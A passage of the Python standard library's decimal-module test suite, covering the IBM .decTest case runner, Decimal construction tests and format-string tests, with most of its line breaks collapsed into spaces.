Signals = {
  C: tuple(C.getcontext().flags.keys()) if C else None,
  P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
  C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
      C.Overflow, C.DivisionByZero, C.InvalidOperation,
      C.FloatOperation] if C else None,
  P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
      P.Overflow, P.DivisionByZero, P.InvalidOperation,
      P.FloatOperation]
}

def assert_signals(cls, context, attr, expected):
    """Assert on *cls* that, in the dict-like *attr* ('flags' or 'traps')
    of *context*, exactly the signals in *expected* are set."""
    d = getattr(context, attr)
    cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))

# Rounding-mode constants, taken from the Python implementation.
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP

RoundingModes = [
  ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
  ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
  ROUND_05UP
]

# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = { C: C.getcontext().copy() if C else None, P: P.getcontext().copy() } def init(m): if not m: return DefaultTestContext = m.Context( prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0) ) m.setcontext(DefaultTestContext) TESTDATADIR = 'decimaltestdata' if __name__ == '__main__': file = sys.argv[0] else: file = __file__ testdir = os.path.dirname(file) or os.curdir directory = testdir + os.sep + TESTDATADIR + os.sep skip_expected = not os.path.isdir(directory) # Make sure it actually raises errors when not expected and caught in flags # Slower, since it runs some things several times. EXTENDEDERRORTEST = False # Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY). EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False requires_extra_functionality = unittest.skipUnless( EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY") skip_if_extra_functionality = unittest.skipIf( EXTRA_FUNCTIONALITY, "test requires regular build") class IBMTestCases(unittest.TestCase): """Class which tests the Decimal class against the IBM test cases.""" def setUp(self): self.context = self.decimal.Context() self.readcontext = self.decimal.Context() self.ignore_list = ['#'] # List of individual .decTest test ids that correspond to tests that # we're skipping for one reason or another. self.skipped_test_ids = set([ # Skip implementation-specific scaleb tests. 'scbx164', 'scbx165', # For some operations (currently exp, ln, log10, power), the decNumber # reference implementation imposes additional restrictions on the context # and operands. These restrictions are not part of the specification; # however, the effect of these restrictions does show up in some of the # testcases. We skip testcases that violate these restrictions, since # Decimal behaves differently from decNumber for these testcases so these # testcases would otherwise fail. 
'expx901', 'expx902', 'expx903', 'expx905', 'lnx901', 'lnx902', 'lnx903', 'lnx905', 'logx901', 'logx902', 'logx903', 'logx905', 'powx1183', 'powx1184', 'powx4001', 'powx4002', 'powx4003', 'powx4005', 'powx4008', 'powx4010', 'powx4012', 'powx4014', ]) if self.decimal == C: # status has additional Subnormal, Underflow self.skipped_test_ids.add('pwsx803') self.skipped_test_ids.add('pwsx805') # Correct rounding (skipped for decNumber, too) self.skipped_test_ids.add('powx4302') self.skipped_test_ids.add('powx4303') self.skipped_test_ids.add('powx4342') self.skipped_test_ids.add('powx4343') # http://bugs.python.org/issue7049 self.skipped_test_ids.add('pwmx325') self.skipped_test_ids.add('pwmx326') # Map test directives to setter functions. self.ChangeDict = {'precision' : self.change_precision, 'rounding' : self.change_rounding_method, 'maxexponent' : self.change_max_exponent, 'minexponent' : self.change_min_exponent, 'clamp' : self.change_clamp} # Name adapter to be able to change the Decimal and Context # interface without changing the test files from Cowlishaw. 
self.NameAdapter = {'and':'logical_and', 'apply':'_apply', 'class':'number_class', 'comparesig':'compare_signal', 'comparetotal':'compare_total', 'comparetotmag':'compare_total_mag', 'copy':'copy_decimal', 'copyabs':'copy_abs', 'copynegate':'copy_negate', 'copysign':'copy_sign', 'divideint':'divide_int', 'invert':'logical_invert', 'iscanonical':'is_canonical', 'isfinite':'is_finite', 'isinfinite':'is_infinite', 'isnan':'is_nan', 'isnormal':'is_normal', 'isqnan':'is_qnan', 'issigned':'is_signed', 'issnan':'is_snan', 'issubnormal':'is_subnormal', 'iszero':'is_zero', 'maxmag':'max_mag', 'minmag':'min_mag', 'nextminus':'next_minus', 'nextplus':'next_plus', 'nexttoward':'next_toward', 'or':'logical_or', 'reduce':'normalize', 'remaindernear':'remainder_near', 'samequantum':'same_quantum', 'squareroot':'sqrt', 'toeng':'to_eng_string', 'tointegral':'to_integral_value', 'tointegralx':'to_integral_exact', 'tosci':'to_sci_string', 'xor':'logical_xor'} # Map test-case names to roundings. self.RoundingDict = {'ceiling' : ROUND_CEILING, 'down' : ROUND_DOWN, 'floor' : ROUND_FLOOR, 'half_down' : ROUND_HALF_DOWN, 'half_even' : ROUND_HALF_EVEN, 'half_up' : ROUND_HALF_UP, 'up' : ROUND_UP, '05up' : ROUND_05UP} # Map the test cases' error names to the actual errors. self.ErrorNames = {'clamped' : self.decimal.Clamped, 'conversion_syntax' : self.decimal.InvalidOperation, 'division_by_zero' : self.decimal.DivisionByZero, 'division_impossible' : self.decimal.InvalidOperation, 'division_undefined' : self.decimal.InvalidOperation, 'inexact' : self.decimal.Inexact, 'invalid_context' : self.decimal.InvalidOperation, 'invalid_operation' : self.decimal.InvalidOperation, 'overflow' : self.decimal.Overflow, 'rounded' : self.decimal.Rounded, 'subnormal' : self.decimal.Subnormal, 'underflow' : self.decimal.Underflow} # The following functions return True/False rather than a # Decimal instance. 
self.LogicalFunctions = ('is_canonical', 'is_finite', 'is_infinite', 'is_nan', 'is_normal', 'is_qnan', 'is_signed', 'is_snan', 'is_subnormal', 'is_zero', 'same_quantum') def read_unlimited(self, v, context): """Work around the limitations of the 32-bit _decimal version. The guaranteed maximum values for prec, Emax etc. are 425000000, but higher values usually work, except for rare corner cases. In particular, all of the IBM tests pass with maximum values of 1070000000.""" if self.decimal == C and self.decimal.MAX_EMAX == 425000000: self.readcontext._unsafe_setprec(1070000000) self.readcontext._unsafe_setemax(1070000000) self.readcontext._unsafe_setemin(-1070000000) return self.readcontext.create_decimal(v) else: return self.decimal.Decimal(v, context) def eval_file(self, file): global skip_expected if skip_expected: raise unittest.SkipTest with open(file) as f: for line in f: line = line.replace('\r\n', '').replace('\n', '') #print line try: t = self.eval_line(line) except self.decimal.DecimalException as exception: #Exception raised where there shouldn't have been one. 
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line) def eval_line(self, s): if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'): s = (s.split('->')[0] + '->' + s.split('->')[1].split('--')[0]).strip() else: s = s.split('--')[0].strip() for ignore in self.ignore_list: if s.find(ignore) >= 0: #print s.split()[0], 'NotImplemented--', ignore return if not s: return elif ':' in s: return self.eval_directive(s) else: return self.eval_equation(s) def eval_directive(self, s): funct, value = (x.strip().lower() for x in s.split(':')) if funct == 'rounding': value = self.RoundingDict[value] else: try: value = int(value) except ValueError: pass funct = self.ChangeDict.get(funct, (lambda *args: None)) funct(value) def eval_equation(self, s): if not TEST_ALL and random.random() < 0.90: return self.context.clear_flags() try: Sides = s.split('->') L = Sides[0].strip().split() id = L[0] if DEBUG: print("Test ", id, end=" ") funct = L[1].lower() valstemp = L[2:] L = Sides[1].strip().split() ans = L[0] exceptions = L[1:] except (TypeError, AttributeError, IndexError): raise self.decimal.InvalidOperation def FixQuotes(val): val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote') val = val.replace("'", '').replace('"', '') val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"') return val if id in self.skipped_test_ids: return fname = self.NameAdapter.get(funct, funct) if fname == 'rescale': return funct = getattr(self.context, fname) vals = [] conglomerate = '' quote = 0 theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions] for exception in Signals[self.decimal]: self.context.traps[exception] = 1 #Catch these bugs... 
for exception in theirexceptions: self.context.traps[exception] = 0 for i, val in enumerate(valstemp): if val.count("'") % 2 == 1: quote = 1 - quote if quote: conglomerate = conglomerate + ' ' + val continue else: val = conglomerate + val conglomerate = '' v = FixQuotes(val) if fname in ('to_sci_string', 'to_eng_string'): if EXTENDEDERRORTEST: for error in theirexceptions: self.context.traps[error] = 1 try: funct(self.context.create_decimal(v)) except error: pass except Signals[self.decimal] as e: self.fail("Raised %s in %s when %s disabled" % \ (e, s, error)) else: self.fail("Did not raise %s in %s" % (error, s)) self.context.traps[error] = 0 v = self.context.create_decimal(v) else: v = self.read_unlimited(v, self.context) vals.append(v) ans = FixQuotes(ans) if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'): for error in theirexceptions: self.context.traps[error] = 1 try: funct(*vals) except error: pass except Signals[self.decimal] as e: self.fail("Raised %s in %s when %s disabled" % \ (e, s, error)) else: self.fail("Did not raise %s in %s" % (error, s)) self.context.traps[error] = 0 # as above, but add traps cumulatively, to check precedence ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions] for error in ordered_errors: self.context.traps[error] = 1 try: funct(*vals) except error: pass except Signals[self.decimal] as e: self.fail("Raised %s in %s; expected %s" % (type(e), s, error)) else: self.fail("Did not raise %s in %s" % (error, s)) # reset traps for error in ordered_errors: self.context.traps[error] = 0 if DEBUG: print("--", self.context) try: result = str(funct(*vals)) if fname in self.LogicalFunctions: result = str(int(eval(result))) # 'True', 'False' -> '1', '0' except Signals[self.decimal] as error: self.fail("Raised %s in %s" % (error, s)) except: #Catch any error long enough to state the test case. 
print("ERROR:", s) raise myexceptions = self.getexceptions() myexceptions.sort(key=repr) theirexceptions.sort(key=repr) self.assertEqual(result, ans, 'Incorrect answer for ' + s + ' -- got ' + result) self.assertEqual(myexceptions, theirexceptions, 'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions)) def getexceptions(self): return [e for e in Signals[self.decimal] if self.context.flags[e]] def change_precision(self, prec): if self.decimal == C and self.decimal.MAX_PREC == 425000000: self.context._unsafe_setprec(prec) else: self.context.prec = prec def change_rounding_method(self, rounding): self.context.rounding = rounding def change_min_exponent(self, exp): if self.decimal == C and self.decimal.MAX_PREC == 425000000: self.context._unsafe_setemin(exp) else: self.context.Emin = exp def change_max_exponent(self, exp): if self.decimal == C and self.decimal.MAX_PREC == 425000000: self.context._unsafe_setemax(exp) else: self.context.Emax = exp def change_clamp(self, clamp): self.context.clamp = clamp class CIBMTestCases(IBMTestCases): decimal = C class PyIBMTestCases(IBMTestCases): decimal = P # The following classes test the behaviour of Decimal according to PEP 327 class ExplicitConstructionTest(unittest.TestCase): '''Unit tests for Explicit Construction cases of Decimal.''' def test_explicit_empty(self): Decimal = self.decimal.Decimal self.assertEqual(Decimal(), Decimal("0")) def test_explicit_from_None(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, Decimal, None) def test_explicit_from_int(self): Decimal = self.decimal.Decimal #positive d = Decimal(45) self.assertEqual(str(d), '45') #very large positive d = Decimal(500000123) self.assertEqual(str(d), '500000123') #negative d = Decimal(-45) self.assertEqual(str(d), '-45') #zero d = Decimal(0) self.assertEqual(str(d), '0') # single word longs for n in range(0, 32): for sign in (-1, 1): for x in range(-5, 5): i = sign * (2**n + x) d = Decimal(i) self.assertEqual(str(d), str(i)) def 
test_explicit_from_string(self): Decimal = self.decimal.Decimal InvalidOperation = self.decimal.InvalidOperation localcontext = self.decimal.localcontext #empty self.assertEqual(str(Decimal('')), 'NaN') #int self.assertEqual(str(Decimal('45')), '45') #float self.assertEqual(str(Decimal('45.34')), '45.34') #engineer notation self.assertEqual(str(Decimal('45e2')), '4.5E+3') #just not a number self.assertEqual(str(Decimal('ugly')), 'NaN') #leading and trailing whitespace permitted self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4') self.assertEqual(str(Decimal(' -7.89')), '-7.89') self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679') # underscores self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41') self.assertEqual(str(Decimal('1_0_0_0')), '1000') # unicode whitespace for lead in ["", ' ', '\u00a0', '\u205f']: for trail in ["", ' ', '\u00a0', '\u205f']: self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)), '9.311E+28') with localcontext() as c: c.traps[InvalidOperation] = True # Invalid string self.assertRaises(InvalidOperation, Decimal, "xyz") # Two arguments max self.assertRaises(TypeError, Decimal, "1234", "x", "y") # space within the numeric part self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03") self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0") # unicode whitespace self.assertRaises(InvalidOperation, Decimal, "\u00a0") self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0") # embedded NUL self.assertRaises(InvalidOperation, Decimal, "12\u00003") # underscores don't prevent errors self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003") @cpython_only def test_from_legacy_strings(self): import _testcapi Decimal = self.decimal.Decimal context = self.decimal.Context() s = _testcapi.unicode_legacy_string('9.999999') self.assertEqual(str(Decimal(s)), '9.999999') self.assertEqual(str(context.create_decimal(s)), '9.999999') def test_explicit_from_tuples(self): Decimal = self.decimal.Decimal #zero d = Decimal( (0, (0,), 
0) ) self.assertEqual(str(d), '0') #int d = Decimal( (1, (4, 5), 0) ) self.assertEqual(str(d), '-45') #float d = Decimal( (0, (4, 5, 3, 4), -2) ) self.assertEqual(str(d), '45.34') #weird d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) self.assertEqual(str(d), '-4.34913534E-17') #inf d = Decimal( (0, (), "F") ) self.assertEqual(str(d), 'Infinity') #wrong number of items self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) ) #bad sign self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2)) #bad exp self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') ) #bad coefficients self.assertRaises(ValueError, Decimal, (1, "xyz", 2) ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) ) self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) ) def test_explicit_from_list(self): Decimal = self.decimal.Decimal d = Decimal([0, [0], 0]) self.assertEqual(str(d), '0') d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25]) self.assertEqual(str(d), '-4.34913534E-17') d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25]) self.assertEqual(str(d), '-4.34913534E-17') d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25)) self.assertEqual(str(d), '-4.34913534E-17') def test_explicit_from_bool(self): Decimal = self.decimal.Decimal self.assertIs(bool(Decimal(0)), False) self.assertIs(bool(Decimal(1)), True) self.assertEqual(Decimal(False), Decimal(0)) self.assertEqual(Decimal(True), Decimal(1)) def test_explicit_from_Decimal(self): Decimal = self.decimal.Decimal #positive d = Decimal(45) e = Decimal(d) self.assertEqual(str(e), '45') #very large 
positive d = Decimal(500000123) e = Decimal(d) self.assertEqual(str(e), '500000123') #negative d = Decimal(-45) e = Decimal(d) self.assertEqual(str(e), '-45') #zero d = Decimal(0) e = Decimal(d) self.assertEqual(str(e), '0') @requires_IEEE_754 def test_explicit_from_float(self): Decimal = self.decimal.Decimal r = Decimal(0.1) self.assertEqual(type(r), Decimal) self.assertEqual(str(r), '0.1000000000000000055511151231257827021181583404541015625') self.assertTrue(Decimal(float('nan')).is_qnan()) self.assertTrue(Decimal(float('inf')).is_infinite()) self.assertTrue(Decimal(float('-inf')).is_infinite()) self.assertEqual(str(Decimal(float('nan'))), str(Decimal('NaN'))) self.assertEqual(str(Decimal(float('inf'))), str(Decimal('Infinity'))) self.assertEqual(str(Decimal(float('-inf'))), str(Decimal('-Infinity'))) self.assertEqual(str(Decimal(float('-0.0'))), str(Decimal('-0'))) for i in range(200): x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0) self.assertEqual(x, float(Decimal(x))) # roundtrip def test_explicit_context_create_decimal(self): Decimal = self.decimal.Decimal InvalidOperation = self.decimal.InvalidOperation Rounded = self.decimal.Rounded nc = copy.copy(self.decimal.getcontext()) nc.prec = 3 # empty d = Decimal() self.assertEqual(str(d), '0') d = nc.create_decimal() self.assertEqual(str(d), '0') # from None self.assertRaises(TypeError, nc.create_decimal, None) # from int d = nc.create_decimal(456) self.assertIsInstance(d, Decimal) self.assertEqual(nc.create_decimal(45678), nc.create_decimal('457E+2')) # from string d = Decimal('456789') self.assertEqual(str(d), '456789') d = nc.create_decimal('456789') self.assertEqual(str(d), '4.57E+5') # leading and trailing whitespace should result in a NaN; # spaces are already checked in Cowlishaw's test-suite, so # here we just check that a trailing newline results in a NaN self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN') # from tuples d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) 
self.assertEqual(str(d), '-4.34913534E-17') d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) self.assertEqual(str(d), '-4.35E-17') # from Decimal prevdec = Decimal(500000123) d = Decimal(prevdec) self.assertEqual(str(d), '500000123') d = nc.create_decimal(prevdec) self.assertEqual(str(d), '5.00E+8') # more integers nc.prec = 28 nc.traps[InvalidOperation] = True for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0, 2**31-1, 2**31, 2**63-1, 2**63]: d = nc.create_decimal(v) self.assertTrue(isinstance(d, Decimal)) self.assertEqual(int(d), v) nc.prec = 3 nc.traps[Rounded] = True self.assertRaises(Rounded, nc.create_decimal, 1234) # from string nc.prec = 28 self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17') self.assertEqual(str(nc.create_decimal('45')), '45') self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity') self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123') # invalid arguments self.assertRaises(InvalidOperation, nc.create_decimal, "xyz") self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25)) self.assertRaises(TypeError, nc.create_decimal, "1234", "5678") # no whitespace and underscore stripping is done with this method self.assertRaises(InvalidOperation, nc.create_decimal, " 1234") self.assertRaises(InvalidOperation, nc.create_decimal, "12_34") # too many NaN payload digits nc.prec = 3 self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345') self.assertRaises(InvalidOperation, nc.create_decimal, Decimal('NaN12345')) nc.traps[InvalidOperation] = False self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN') self.assertTrue(nc.flags[InvalidOperation]) nc.flags[InvalidOperation] = False self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN') self.assertTrue(nc.flags[InvalidOperation]) def test_explicit_context_create_from_float(self): Decimal = self.decimal.Decimal nc = self.decimal.Context() r = nc.create_decimal(0.1) self.assertEqual(type(r), Decimal) self.assertEqual(str(r), 
'0.1000000000000000055511151231') self.assertTrue(nc.create_decimal(float('nan')).is_qnan()) self.assertTrue(nc.create_decimal(float('inf')).is_infinite()) self.assertTrue(nc.create_decimal(float('-inf')).is_infinite()) self.assertEqual(str(nc.create_decimal(float('nan'))), str(nc.create_decimal('NaN'))) self.assertEqual(str(nc.create_decimal(float('inf'))), str(nc.create_decimal('Infinity'))) self.assertEqual(str(nc.create_decimal(float('-inf'))), str(nc.create_decimal('-Infinity'))) self.assertEqual(str(nc.create_decimal(float('-0.0'))), str(nc.create_decimal('-0'))) nc.prec = 100 for i in range(200): x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0) self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip def test_unicode_digits(self): Decimal = self.decimal.Decimal test_values = { '\uff11': '1', '\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372', '-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400', } for input, expected in test_values.items(): self.assertEqual(str(Decimal(input)), expected) class CExplicitConstructionTest(ExplicitConstructionTest): decimal = C class PyExplicitConstructionTest(ExplicitConstructionTest): decimal = P class ImplicitConstructionTest(unittest.TestCase): '''Unit tests for Implicit Construction cases of Decimal.''' def test_implicit_from_None(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals()) def test_implicit_from_int(self): Decimal = self.decimal.Decimal #normal self.assertEqual(str(Decimal(5) + 45), '50') #exceeding precision self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000)) def test_implicit_from_string(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals()) def test_implicit_from_float(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals()) def test_implicit_from_Decimal(self): Decimal = self.decimal.Decimal self.assertEqual(Decimal(5) + Decimal(45), 
Decimal(50)) def test_rop(self): Decimal = self.decimal.Decimal # Allow other classes to be trained to interact with Decimals class E: def __divmod__(self, other): return 'divmod ' + str(other) def __rdivmod__(self, other): return str(other) + ' rdivmod' def __lt__(self, other): return 'lt ' + str(other) def __gt__(self, other): return 'gt ' + str(other) def __le__(self, other): return 'le ' + str(other) def __ge__(self, other): return 'ge ' + str(other) def __eq__(self, other): return 'eq ' + str(other) def __ne__(self, other): return 'ne ' + str(other) self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10') self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod') self.assertEqual(eval('Decimal(10) < E()'), 'gt 10') self.assertEqual(eval('Decimal(10) > E()'), 'lt 10') self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10') self.assertEqual(eval('Decimal(10) >= E()'), 'le 10') self.assertEqual(eval('Decimal(10) == E()'), 'eq 10') self.assertEqual(eval('Decimal(10) != E()'), 'ne 10') # insert operator methods and then exercise them oplist = [ ('+', '__add__', '__radd__'), ('-', '__sub__', '__rsub__'), ('*', '__mul__', '__rmul__'), ('/', '__truediv__', '__rtruediv__'), ('%', '__mod__', '__rmod__'), ('//', '__floordiv__', '__rfloordiv__'), ('**', '__pow__', '__rpow__') ] for sym, lop, rop in oplist: setattr(E, lop, lambda self, other: 'str' + lop + str(other)) setattr(E, rop, lambda self, other: str(other) + rop + 'str') self.assertEqual(eval('E()' + sym + 'Decimal(10)'), 'str' + lop + '10') self.assertEqual(eval('Decimal(10)' + sym + 'E()'), '10' + rop + 'str') class CImplicitConstructionTest(ImplicitConstructionTest): decimal = C class PyImplicitConstructionTest(ImplicitConstructionTest): decimal = P class FormatTest(unittest.TestCase): '''Unit tests for the format function.''' def test_formatting(self): Decimal = self.decimal.Decimal # triples giving a format, a Decimal, and the expected result test_values = [ ('e', '0E-15', '0e-15'), ('e', '2.3E-15', '2.3e-15'), 
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros ('e', '2.30000E-15', '2.30000e-15'), ('e', '1.23456789123456789e40', '1.23456789123456789e+40'), ('e', '1.5', '1.5e+0'), ('e', '0.15', '1.5e-1'), ('e', '0.015', '1.5e-2'), ('e', '0.0000000000015', '1.5e-12'), ('e', '15.0', '1.50e+1'), ('e', '-15', '-1.5e+1'), ('e', '0', '0e+0'), ('e', '0E1', '0e+1'), ('e', '0.0', '0e-1'), ('e', '0.00', '0e-2'), ('.6e', '0E-15', '0.000000e-9'), ('.6e', '0', '0.000000e+6'), ('.6e', '9.999999', '9.999999e+0'), ('.6e', '9.9999999', '1.000000e+1'), ('.6e', '-1.23e5', '-1.230000e+5'), ('.6e', '1.23456789e-3', '1.234568e-3'), ('f', '0', '0'), ('f', '0.0', '0.0'), ('f', '0E-2', '0.00'), ('f', '0.00E-8', '0.0000000000'), ('f', '0E1', '0'), # loses exponent information ('f', '3.2E1', '32'), ('f', '3.2E2', '320'), ('f', '3.20E2', '320'), ('f', '3.200E2', '320.0'), ('f', '3.2E-6', '0.0000032'), ('.6f', '0E-15', '0.000000'), # all zeros treated equally ('.6f', '0E1', '0.000000'), ('.6f', '0', '0.000000'), ('.0f', '0', '0'), # no decimal point ('.0f', '0e-2', '0'), ('.0f', '3.14159265', '3'), ('.1f', '3.14159265', '3.1'), ('.4f', '3.14159265', '3.1416'), ('.6f', '3.14159265', '3.141593'), ('.7f', '3.14159265', '3.1415926'), # round-half-even! ('.8f', '3.14159265', '3.14159265'), ('.9f', '3.14159265', '3.141592650'), ('g', '0', '0'), ('g', '0.0', '0.0'), ('g', '0E1', '0e+1'), ('G', '0E1', '0E+1'), ('g', '0E-5', '0.00000'), ('g', '0E-6', '0.000000'), ('g', '0E-7', '0e-7'), ('g', '-0E2', '-0e+2'), ('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig ('.0n', '3.14159265', '3'), # same for 'n' ('.1g', '3.14159265', '3'), ('.2g', '3.14159265', '3.1'), ('.5g', '3.14159265', '3.1416'), ('.7g', '3.14159265', '3.141593'), ('.8g', '3.14159265', '3.1415926'), # round-half-even! 
('.9g', '3.14159265', '3.14159265'), ('.10g', '3.14159265', '3.14159265'), # don't pad ('%', '0E1', '0%'), ('%', '0E0', '0%'), ('%', '0E-1', '0%'), ('%', '0E-2', '0%'), ('%', '0E-3', '0.0%'), ('%', '0E-4', '0.00%'), ('.3%', '0', '0.000%'), # all zeros treated equally ('.3%', '0E10', '0.000%'), ('.3%', '0E-10', '0.000%'), ('.3%', '2.34', '234.000%'), ('.3%', '1.234567', '123.457%'), ('.0%', '1.23', '123%'), ('e', 'NaN', 'NaN'), ('f', '-NaN123', '-NaN123'), ('+g', 'NaN456', '+NaN456'), ('.3e', 'Inf', 'Infinity'), ('.16f', '-Inf', '-Infinity'), ('.0g', '-sNaN', '-sNaN'), ('', '1.00', '1.00'), # test alignment and padding ('6', '123', ' 123'), ('<6', '123', '123 '), ('>6', '123', ' 123'), ('^6', '123', ' 123 '), ('=+6', '123', '+ 123'), ('#<10', 'NaN', 'NaN#######'), ('#<10', '-4.3', '-4.3######'), ('#<+10', '0.0130', '+0.0130###'), ('#< 10', '0.0130', ' 0.0130###'), ('@>10', '-Inf', '@-Infinity'), ('#>5', '-Inf', '-Infinity'), ('?^5', '123', '?123?'), ('%^6', '123', '%123%%'), (' ^6', '-45.6', '-45.6 '), ('/=10', '-45.6', '-/////45.6'), ('/=+10', '45.6', '+/////45.6'), ('/= 10', '45.6', ' /////45.6'), ('\x00=10', '-inf', '-\x00Infinity'), ('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'), ('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'), ('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'), # thousands separator (',', '1234567', '1,234,567'), (',', '123456', '123,456'), (',', '12345', '12,345'), (',', '1234', '1,234'), (',', '123', '123'), (',', '12', '12'), (',', '1', '1'), (',', '0', '0'), (',', '-1234567', '-1,234,567'), (',', '-123456', '-123,456'), ('7,', '123456', '123,456'), ('8,', '123456', ' 123,456'), ('08,', '123456', '0,123,456'), # special case: extra 0 needed ('+08,', '123456', '+123,456'), # but not if there's a sign (' 08,', '123456', ' 123,456'), ('08,', '-123456', '-123,456'), ('+09,', '123456', '+0,123,456'), # ... with fractional part... 
('07,', '1234.56', '1,234.56'), ('08,', '1234.56', '1,234.56'), ('09,', '1234.56', '01,234.56'), ('010,', '1234.56', '001,234.56'), ('011,', '1234.56', '0,001,234.56'), ('012,', '1234.56', '0,001,234.56'), ('08,.1f', '1234.5', '01,234.5'), # no thousands separators in fraction part (',', '1.23456789', '1.23456789'), (',%', '123.456789', '12,345.6789%'), (',e', '123456', '1.23456e+5'), (',E', '123456', '1.23456E+5'), # issue 6850 ('a=-7.0', '0.12345', 'aaaa0.1'), # issue 22090 ('<^+15.20%', 'inf', '<<+Infinity%<<<'), ('\x07>,%', 'sNaN1234567', 'sNaN1234567%'), ('=10.10%', 'NaN123', ' NaN123%'), ] for fmt, d, result in test_values: self.assertEqual(format(Decimal(d), fmt), result) # bytes format argument self.assertRaises(TypeError, Decimal(1).__format__, b'-020') def test_n_format(self): Decimal = self.decimal.Decimal try: from locale import CHAR_MAX except ImportError: self.skipTest('locale.CHAR_MAX not available') def make_grouping(lst): return ''.join([chr(x) for x in lst]) if self.decimal == C else lst def get_fmt(x, override=None, fmt='n'): if self.decimal == C: return Decimal(x).__format__(fmt, override) else: return Decimal(x).__format__(fmt, _localeconv=override) # Set up some localeconv-like dictionaries en_US = { 'decimal_point' : '.', 'grouping' : make_grouping([3, 3, 0]), 'thousands_sep' : ',' } fr_FR = { 'decimal_point' : ',', 'grouping' : make_grouping([CHAR_MAX]), 'thousands_sep' : '' } ru_RU = { 'decimal_point' : ',', 'grouping': make_grouping([3, 3, 0]), 'thousands_sep' : ' ' } crazy = { 'decimal_point' : '&', 'grouping': make_grouping([1, 4, 2, CHAR_MAX]), 'thousands_sep' : '-' } dotsep_wide = { 'decimal_point' : b'\xc2\xbf'.decode('utf-8'), 'grouping': make_grouping([3, 3, 0]), 'thousands_sep' : b'\xc2\xb4'.decode('utf-8') } 